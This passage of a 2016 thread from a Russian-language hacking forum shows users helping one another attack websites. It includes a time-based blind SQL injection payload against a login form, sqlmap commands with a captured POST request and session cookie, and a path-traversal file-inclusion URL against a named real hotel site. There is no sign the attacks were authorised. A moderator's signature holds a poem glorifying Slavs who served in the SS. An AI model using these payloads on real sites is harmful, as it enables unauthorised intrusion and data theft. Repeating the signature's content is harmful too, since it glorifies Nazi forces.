HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1551  
Старый 06.12.2016, 23:33
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от madam  
madam said:

в смысле логин и пароль ,уже пыталась
'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
вот таким перебором вытащила имя базы
но вот sqlmap никак нехочет найти ihj
Должен sqlmap -u site.com/login/ --form пробуйте
 
Ответить с цитированием

  #1552  
Старый 07.12.2016, 00:06
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Должен sqlmap -u site.com/login/ --form пробуйте
--forms тоже нет((
 
Ответить с цитированием

  #1553  
Старый 07.12.2016, 12:10
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

sqlmap умеет загружать куки сам?может в этом проблема
 
Ответить с цитированием

  #1554  
Старый 07.12.2016, 12:23
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?

Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом

Код:
Code:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2

Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.

Но я так понял что [4096] слешей не работают с php версией 5.4.45
 
Ответить с цитированием

  #1555  
Старый 07.12.2016, 12:34
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом
http://hotel-stalingrad.ru/index.php?page=cafe
там так же инклудятся локальные файлы как и c этим сайтом
Код:
Code:
hotel-stalingrad.ru/index.php?page=../admin/index
На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45
Ну не откинешь ты .php с этого и надо было начинать
 
Ответить с цитированием

  #1556  
Старый 07.12.2016, 13:21
Zen1T21
Guest
Сообщений: n/a
Провел на форуме:
51991

Репутация: 2
По умолчанию

Цитата:
Сообщение от madam  
madam said:

Вот я и говорю мож не те параметры задаю((
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A ))%2b%27&password=&login=Login
sqlmap.py -u
https://site.com/admin/login/
--data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP( 25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent
что тогда здесь не так?
Cохрани все в файл и пробни sqlmap.py -r 'file.txt'
 
Ответить с цитированием

  #1557  
Старый 07.12.2016, 14:17
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable

какие только параметры не задавала((

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

всё что узнала(
 
Ответить с цитированием

  #1558  
Старый 07.12.2016, 14:20
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от madam  
madam said:

да всё равно [17:20:42] [WARNING] POST parameter 'username' is not injectable
какие только параметры не задавала((
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
всё что узнала(
ты руками то пробовала, там есть вообще скуль?

если есть - изучай софт гадать тут долго можно почему не крутит
 
Ответить с цитированием

  #1559  
Старый 07.12.2016, 14:25
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

скуля есть что параметре username что в password

могу скинуть сайт, если подскажете
 
Ответить с цитированием

  #1560  
Старый 07.12.2016, 14:54
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от madam  
madam said:

скуля есть что параметре username что в password
могу скинуть сайт, если подскажете
что мешает плодить посты в соседней теме, специально для SQLMAP'a? я чуть позже все удалю.
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ